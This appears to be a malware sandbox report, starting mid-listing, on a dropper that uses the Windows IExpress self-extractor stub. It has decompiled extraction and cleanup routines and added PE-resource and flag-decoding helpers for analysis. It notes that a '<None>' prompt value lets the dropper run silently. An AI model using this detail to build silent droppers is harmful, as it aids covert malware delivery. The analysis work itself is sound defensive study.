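            _walk(data, res_off, res_off + (off & 0x7FFFFFFF), sections, key, out)
        else:                                     # IMAGE_RESOURCE_DATA_ENTRY: data RVA, size
            rva, size = struct.unpack_from("<II", data, res_off + off)
            start = _rva_to_offset(sections, rva)
            out[key] = data[start : start + size]


def pe_resources(data):
    """Return {(type, name, lang): raw bytes} for every resource in a PE32 or PE32+ image."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe : pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    datadir = opt + (96 if magic == 0x10B else 112)                      # PE32 vs PE32+
    res_rva, _res_size = struct.unpack_from("<II", data, datadir + 2 * 8)  # IMAGE_DIRECTORY_ENTRY_RESOURCE
    sections = []
    for i in range(nsec):
        s = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_off = struct.unpack_from("<IIII", data, s + 8)
        sections.append((va, vsize, raw_off, raw_size))
    out = {}
    if res_rva:
        res_off = _rva_to_offset(sections, res_rva)
        _walk(data, res_off, res_off, sections, (), out)
    return out


def sfx_prompt(data):
    """Mirror E003951E5's decision: (TITLE text, UPROMPT text or None, runs_silently)."""
    rcdata = {k[1]: v for k, v in pe_resources(data).items() if k[0] == RT_RCDATA and isinstance(k[1], str)}
    title = rcdata.get("TITLE", b"").split(b"\0", 1)[0].decode("latin-1")
    prompt = rcdata.get("UPROMPT")
    if prompt is None:          # the stub fails here with 0x80070714 (ERROR_RESOURCE_DATA_NOT_FOUND)
        return title, None, False
    prompt = prompt.split(b"\0", 1)[0].decode("latin-1")
    return title, prompt, prompt == "<None>"   # "<None>" skips the Yes/No MessageBox entirely


def build_test_pe(title, uprompt):
    """Constructed test input (not a real sample): minimal PE32 with one .rsrc section holding RCDATA TITLE and UPROMPT."""
    RSRC_RVA, RSRC_RAW = 0x1000, 0x400

    def directory(entries):  # IMAGE_RESOURCE_DIRECTORY header + entries; named entries precede ID entries
        named = sum(1 for n, _ in entries if n & 0x80000000)
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named) + b"".join(
            struct.pack("<II", n, o) for n, o in entries)

    # Fixed layout: root dir 0, name dir 24, lang dirs 56/80, data entries 104/120, name strings 136/148, data 164.
    rsrc = (directory([(RT_RCDATA, 0x80000000 | 24)])
            + directory([(0x80000000 | 136, 0x80000000 | 56), (0x80000000 | 148, 0x80000000 | 80)])
            + directory([(0x409, 104)]) + directory([(0x409, 120)])
            + struct.pack("<IIII", RSRC_RVA + 164, len(title), 0, 0)
            + struct.pack("<IIII", RSRC_RVA + 164 + len(title), len(uprompt), 0, 0)
            + struct.pack("<H", 5) + "TITLE".encode("utf-16-le")
            + struct.pack("<H", 7) + "UPROMPT".encode("utf-16-le")
            + title + uprompt)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    optional = (struct.pack("<H", 0x10B) + b"\0" * 94                    # PE32 magic, remaining fields zeroed
                + b"\0" * 16 + struct.pack("<II", RSRC_RVA, len(rsrc)) + b"\0" * 104)  # data dir #2 = resources
    section = b".rsrc\0\0\0" + struct.pack("<IIIIIIHHI", len(rsrc), RSRC_RVA, len(rsrc), RSRC_RAW, 0, 0, 0, 0, 0x40000040)
    headers = dos + coff + optional + section
    return headers + b"\0" * (RSRC_RAW - len(headers)) + rsrc


if __name__ == "__main__":
    print(sfx_prompt(build_test_pe(b"Installer\0", b"Do you want to continue?\0")))
    print(sfx_prompt(build_test_pe(b"Installer\0", b"<None>\0")))
```

Against a real dropper, replace `build_test_pe(...)` with the file's bytes; `pe_resources` returns every resource keyed by (type, name, language), so the same walk also surfaces any other named RCDATA payloads the stub carries next to TITLE and UPROMPT.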






Address column (one entry per line of the decompiled function above, as emitted by the report; 0x00000000 where no address is mapped): 0x003951fb, 0x00395207, 0x0039520b, 0x0039523c, 0x00395268, 0x00395270, 0x0039528b, 0x00395293, 0x0039529c, 0x003952a6, 0x003952b0, 0x00000000, 0x003952b0, 0x0039529e, 0x00395279, 0x00000000, 0x0039527b, 0x00395273, 0x00000000, 0x00395273, 0x0039524a, 0x00395250, 0x00395256, 0x00000000, 0x00395256, 0x00395219, 0x00395223, 0x00000000

APIs
  • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
  • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
  • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
  • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
  • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
  • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
  • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F4D,?,00000002,00000000), ref: 00395201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00395250
  • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
  • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
  • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: 4a56c3a60be239ae926b26639e70dec1de2c97267627ec9e272c35a8e8186b24
                                                                                                                                                                                                    • Instruction ID: eb4fe2a5b5f3ea0ad6f0a82a002a8933f2a9932d97c3c448f7822acb51617463
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a56c3a60be239ae926b26639e70dec1de2c97267627ec9e272c35a8e8186b24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB11C8B52016027BEF176B755C49F3B71ADEB89340F11482FF682D9290DA7A9C414264
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
			E003952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				char* _t22; // declaration added: used below but missing from the decompiler output
				void* _t28; // declaration added: used below but missing from the decompiler output
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x398004; // 0x74c05eb4
				_v8 = _t9 ^ _t33; // stack cookie
				_push(__esi);
				_t31 =  *0x3991e0; // 0x2a78eb0
				if(_t31 != 0) {
					_push(__edi);
					do {
						// walk the linked list of extracted file names, deleting each file
						_t29 = _t31;
						if( *0x398a24 == 0 &&  *0x399a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x398a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x398a24 == 0 &&  *0x399a30 == 0) {
					_push(_t22);
					E00391781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x399a34 & 0x00000020) != 0) {
						E003965E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00392390( &_v268);
					_t11 =  *0x398a20; // 0x0
				}
				if( *0x399a40 != 1 && _t11 != 0) {
					_t11 = E00391FE1(_t22); // executed
				}
				 *0x398a20 =  *0x398a20 & 0x00000000;
				return E00396CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

APIs
• SetFileAttributesA.KERNELBASE(02A78EB0,00000080,?,00000000), ref: 003952F2
• DeleteFileA.KERNELBASE(02A78EB0), ref: 003952FA
• LocalFree.KERNEL32(02A78EB0,?,00000000), ref: 00395305
• LocalFree.KERNEL32(02A78EB0), ref: 0039530C
• SetCurrentDirectoryA.KERNELBASE(003911FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00395363
Strings
• C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00395334
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
• API String ID: 2833751637-1116576409
• Opcode ID: 0ce7d724652095b5d7202bacd00a3c5312a5fb2e726a9c7d9c0c0b369ce43b64
• Instruction ID: 7aa0efa7229d03f6dbab7cb6225dcf3e489ef2e60c61078501f6841044a3eef3
• Opcode Fuzzy Hash: 0ce7d724652095b5d7202bacd00a3c5312a5fb2e726a9c7d9c0c0b369ce43b64
• Instruction Fuzzy Hash: D321A135501A04EFDF239B24EC49B6977A8FB44750F05025BE886962A0CFB25CC4CB84
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00391FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x398530 != 0) {
					// remove the self-registered RunOnce cleanup entry
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
                                                                                                                                                                                                    			}


APIs
• RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0039538C,?,?,0039538C), ref: 00392005
• RegDeleteValueA.KERNELBASE(0039538C,wextract_cleanup1,?,?,0039538C), ref: 00392017
• RegCloseKey.ADVAPI32(0039538C,?,?,0039538C), ref: 00392020
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
• API String ID: 849931509-1592051331
• Opcode ID: 2c3ada135dd6083089893b25a85918a53d67e61dd767d76e306f6b826aff6787
• Instruction ID: 3fd196843f3a32659a5f6ac4ab0261e131a22acadcd791d439ae2739fb9aefb0
• Opcode Fuzzy Hash: 2c3ada135dd6083089893b25a85918a53d67e61dd767d76e306f6b826aff6787
• Instruction Fuzzy Hash: 20E04F30550718FBDF238B90EC0AF6E7B2DF742740F110296F904A0260EB625A14E645
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E00394CD0(char* __edx, long _a4, int _a8) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t29;
	int _t30;
	long _t32;
	signed int _t33;
	long _t35;
	long _t36;
	struct HWND__* _t37;
	long _t38;
	long _t39;
	long _t41;
	long _t44;
	long _t45;
	long _t46;
	signed int _t50;
	long _t51;
	char* _t58;
	long _t59;
	char* _t63;
	long _t64;
	CHAR* _t71;
	CHAR* _t74;
	int _t75;
	signed int _t76;

	_t69 = __edx;
	_t29 =  *0x398004; // 0x74c05eb4
	_t30 = _t29 ^ _t76;
	_v8 = _t30;
	_t75 = _a8;
	if( *0x3991d8 == 0) {
		_t32 = _a4;
		__eflags = _t32;
		if(_t32 == 0) {
			_t33 = E00394E99(_t75);
			L35:
			return E00396CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
		}
		_t35 = _t32 - 1;
		__eflags = _t35;
		if(_t35 == 0) {
			L9:
			_t33 = 0;
			goto L35;
		}
		_t36 = _t35 - 1;
		__eflags = _t36;
		if(_t36 == 0) {
			_t37 =  *0x398584; // 0x0
			__eflags = _t37;
			if(_t37 != 0) {
				SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
			}
			_t54 = 0x3991e4;
			_t58 = 0x3991e4;
			do {
				_t38 =  *_t58;
				_t58 =  &(_t58[1]);
				__eflags = _t38;
			} while (_t38 != 0);
			_t59 = _t58 - 0x3991e5;
			__eflags = _t59;
			_t71 =  *(_t75 + 4);
			_t73 =  &(_t71[1]);
			do {
				_t39 =  *_t71;
				_t71 =  &(_t71[1]);
				__eflags = _t39;
			} while (_t39 != 0);
			_t69 = _t71 - _t73;
			_t30 = _t59 + 1 + _t71 - _t73;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				L3:
				_t33 = _t30 | 0xffffffff;
				goto L35;
			}
			_t69 = 0x3991e4;
			_t30 = E00394702( &_v268, 0x3991e4,  *(_t75 + 4));
			__eflags = _t30;
			if(__eflags == 0) {
				goto L3;
			}
			_t41 = E0039476D( &_v268, __eflags);
			__eflags = _t41;
			if(_t41 == 0) {
				goto L9;
			}
			_push(0x180);
			_t30 = E00394980( &_v268, 0x8302); // executed
			_t75 = _t30;
			__eflags = _t75 - 0xffffffff;
			if(_t75 == 0xffffffff) {
				goto L3;
			}
			_t30 = E003947E0( &_v268);
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			 *0x3993f4 =  *0x3993f4 + 1;
			_t33 = _t75;
			goto L35;
		}
		_t44 = _t36 - 1;
		__eflags = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						_t54 = 0x3991e4;
                                                                                                                                                                                                    						_t63 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t64 = _t63 - 0x3991e5;
                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x3991e4;
                                                                                                                                                                                                    						_t30 = E00394702( &_v268, 0x3991e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                    						_t30 = E00394C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00394B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                    					_t30 = E00394B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                    			}
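The three checks that are readable in the listing above (the MAX_PATH guard built from two inline strlen loops, the attribute word passed to SetFileAttributesA, and the constants handed to the open call) are reimplemented here as an added example in plain C. This is editor-written illustration, not code from the Joe Sandbox report or from the sample. It assumes that E00394702 joins the two strings as "dir\name", that E00394980 wraps the MSVC CRT _open (so 0x8302 and 0x180 decode as CRT flag and mode bits), and it uses constructed sample paths; the Win32 attribute values and CRT bit values are standard.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constants visible in the listing, named with their Win32 / MSVC CRT meanings. */
#define PATH_LIMIT     0x104  /* MAX_PATH: the routine bails when len(dir)+1+len(name) >= 0x104 */
#define ATTR_KEEP_MASK 0x27   /* FILE_ATTRIBUTE_READONLY|HIDDEN|SYSTEM|ARCHIVE */
#define ATTR_NORMAL    0x80   /* FILE_ATTRIBUTE_NORMAL, used when the stored attribute word is 0 */

typedef struct { uint32_t bit; const char *name; } flag_name_t;

/* MSVC CRT _open() flag bits (assumption: E00394980 wraps _open; its 0x8302 decodes to these). */
static const flag_name_t crt_open_flags[] = {
    {0x0001, "_O_WRONLY"}, {0x0002, "_O_RDWR"},  {0x0008, "_O_APPEND"},
    {0x0100, "_O_CREAT"},  {0x0200, "_O_TRUNC"}, {0x0400, "_O_EXCL"},
    {0x4000, "_O_TEXT"},   {0x8000, "_O_BINARY"},
};
/* MSVC CRT permission bits for the pushed 0x180 argument, same assumption. */
static const flag_name_t crt_mode_bits[] = {
    {0x0080, "_S_IWRITE"}, {0x0100, "_S_IREAD"},
};
/* Win32 file attribute bits relevant to the 0x27 mask and the 0x80 fallback. */
static const flag_name_t file_attr_bits[] = {
    {0x01, "READONLY"}, {0x02, "HIDDEN"}, {0x04, "SYSTEM"}, {0x20, "ARCHIVE"}, {0x80, "NORMAL"},
};

/* Renders a bit mask as "A|B|C"; leftover bits not in the table are appended in hex. */
static void describe_bits(uint32_t v, const flag_name_t *tab, size_t n, char *out, size_t outsz) {
    size_t used = 0;
    out[0] = '\0';
    for (size_t i = 0; i < n && used < outsz; i++) {
        if (v & tab[i].bit) {
            int w = snprintf(out + used, outsz - used, "%s%s", used ? "|" : "", tab[i].name);
            if (w < 0) return;
            used += (size_t)w;
            v &= ~tab[i].bit;
        }
    }
    if (v && used < outsz)
        snprintf(out + used, outsz - used, "%s0x%x", used ? "|" : "", v);
}

void describe_open_flags(uint32_t f, char *out, size_t outsz) {
    describe_bits(f, crt_open_flags, sizeof crt_open_flags / sizeof *crt_open_flags, out, outsz);
}
void describe_open_mode(uint32_t m, char *out, size_t outsz) {
    describe_bits(m, crt_mode_bits, sizeof crt_mode_bits / sizeof *crt_mode_bits, out, outsz);
}
void describe_attrs(uint32_t a, char *out, size_t outsz) {
    describe_bits(a, file_attr_bits, sizeof file_attr_bits / sizeof *file_attr_bits, out, outsz);
}

/* Same test as the two inline strlen loops: len(dir) + 1 + len(name) must stay below 0x104. */
int drop_path_fits(const char *dir, const char *name) {
    return strlen(dir) + 1 + strlen(name) < PATH_LIMIT;
}

/* Joins dir and name into out; returns 0 (the listing's "goto L3") when the length check fails.
   That the joined form is "dir\name" is an assumption about E00394702. */
int build_drop_path(const char *dir, const char *name, char *out, size_t outsz) {
    if (!drop_path_fits(dir, name)) return 0;
    int w = snprintf(out, outsz, "%s\\%s", dir, name);
    return w > 0 && (size_t)w < outsz;
}

/* Attribute word handed to SetFileAttributesA: masked stored value, or NORMAL when it is zero.
   Note the edge case: a non-zero stored word with no bits inside 0x27 yields 0, not NORMAL. */
uint32_t select_attributes(uint16_t stored) {
    return stored ? (uint32_t)(stored & ATTR_KEEP_MASK) : ATTR_NORMAL;
}

int main(void) {
    char buf[64], path[PATH_LIMIT];
    describe_open_flags(0x8302, buf, sizeof buf);              printf("0x8302 -> %s\n", buf);
    describe_open_mode(0x180, buf, sizeof buf);                printf("0x180  -> %s\n", buf);
    describe_attrs(select_attributes(0x2027), buf, sizeof buf); printf("stored 0x2027 -> %s\n", buf);
    describe_attrs(select_attributes(0), buf, sizeof buf);      printf("stored 0      -> %s\n", buf);
    /* constructed sample input, not taken from the report */
    if (build_drop_path("C:\\Users\\user\\AppData\\Local\\Temp", "file.exe", path, sizeof path))
        printf("drop path: %s\n", path);
    return 0;
}
```

The attribute helper is worth running against odd inputs: because the listing tests the stored word for zero before masking, a stored value such as 0x0100 (a bit outside the 0x27 mask) reaches SetFileAttributesA as 0 rather than as FILE_ATTRIBUTE_NORMAL.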

[Address column of the report's disassembly view (0x00394cd0 through 0x00394e98); the per-line pairing with the listing was lost in extraction.]
                                                                                                                                                                                                    0x00394d40
                                                                                                                                                                                                    0x00394d42
                                                                                                                                                                                                    0x00394d43
                                                                                                                                                                                                    0x00394d43
                                                                                                                                                                                                    0x00394d47
                                                                                                                                                                                                    0x00394d4a
                                                                                                                                                                                                    0x00394d4a
                                                                                                                                                                                                    0x00394d4c
                                                                                                                                                                                                    0x00394d4f
                                                                                                                                                                                                    0x00394d4f
                                                                                                                                                                                                    0x00394d51
                                                                                                                                                                                                    0x00394d52
                                                                                                                                                                                                    0x00394d52
                                                                                                                                                                                                    0x00394d56
                                                                                                                                                                                                    0x00394d5b
                                                                                                                                                                                                    0x00394d5d
                                                                                                                                                                                                    0x00394d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d67
                                                                                                                                                                                                    0x00394d6f
                                                                                                                                                                                                    0x00394d74
                                                                                                                                                                                                    0x00394d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d7c
                                                                                                                                                                                                    0x00394d84
                                                                                                                                                                                                    0x00394d89
                                                                                                                                                                                                    0x00394d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d94
                                                                                                                                                                                                    0x00394d99
                                                                                                                                                                                                    0x00394d9e
                                                                                                                                                                                                    0x00394da1
                                                                                                                                                                                                    0x00394daa
                                                                                                                                                                                                    0x00394daa
                                                                                                                                                                                                    0x00394da3
                                                                                                                                                                                                    0x00394da3
                                                                                                                                                                                                    0x00394da3
                                                                                                                                                                                                    0x00394db5
                                                                                                                                                                                                    0x00394dbb
                                                                                                                                                                                                    0x00394dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394dc3
                                                                                                                                                                                                    0x00394dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394dc5
                                                                                                                                                                                                    0x00394dbd
                                                                                                                                                                                                    0x00394d2a
                                                                                                                                                                                                    0x00394d2a
                                                                                                                                                                                                    0x00394d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394d2d
                                                                                                                                                                                                    0x00394cf8
                                                                                                                                                                                                    0x00394cfd
                                                                                                                                                                                                    0x00394d02
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00394DB5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00394DDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 3625706803-1116576409
                                                                                                                                                                                                    • Opcode ID: ec99f5b92e9854cb4b17e0212a0d78e379dbdac4dac518ef09517d054ae71d7d
                                                                                                                                                                                                    • Instruction ID: 1a2c7645ae92beb74090120e79ade4a5c13e13b7c3b457db5fed4ba6a98e7cbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec99f5b92e9854cb4b17e0212a0d78e379dbdac4dac518ef09517d054ae71d7d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D41453A6001059BCF239F38DC44EB673A9FF45304F054669E882AB686DB32DE4BC790
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                     			E00394C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                     				struct _FILETIME _v12;   // UTC FILETIME handed to SetFileTime
                                                                                                                                                                                                     				struct _FILETIME _v20;   // local-time FILETIME produced from the DOS date/time
                                                                                                                                                                                                     				FILETIME* _t14;
                                                                                                                                                                                                     				int _t15;
                                                                                                                                                                                                     				signed int _t21;
                                                                                                                                                                                                     
                                                                                                                                                                                                     				// __ecx indexes a table of 0x18-byte records based at 0x398d64; __edx and _a4 are
                                                                                                                                                                                                     				// the packed DOS (FAT) date and time words passed to DosDateTimeToFileTime.
                                                                                                                                                                                                     				_t21 = __ecx * 0x18;
                                                                                                                                                                                                     				// A record whose first field is 1 is skipped. Otherwise the DOS timestamp, which is
                                                                                                                                                                                                     				// local time, is converted to a UTC FILETIME; any failure makes the routine return 0.
                                                                                                                                                                                                     				if( *((intOrPtr*)(_t21 + 0x398d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                     					L5:
                                                                                                                                                                                                     					return 0;
                                                                                                                                                                                                     				} else {
                                                                                                                                                                                                     					// Record field +0x10 is used as the open file handle. Creation, last-access and
                                                                                                                                                                                                     					// last-write time are all set to the same converted value.
                                                                                                                                                                                                     					_t14 =  &_v12;
                                                                                                                                                                                                     					_t15 = SetFileTime( *(_t21 + 0x398d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                     					if(_t15 == 0) {
                                                                                                                                                                                                     						goto L5;
                                                                                                                                                                                                     					}
                                                                                                                                                                                                     					return 1;
                                                                                                                                                                                                     				}
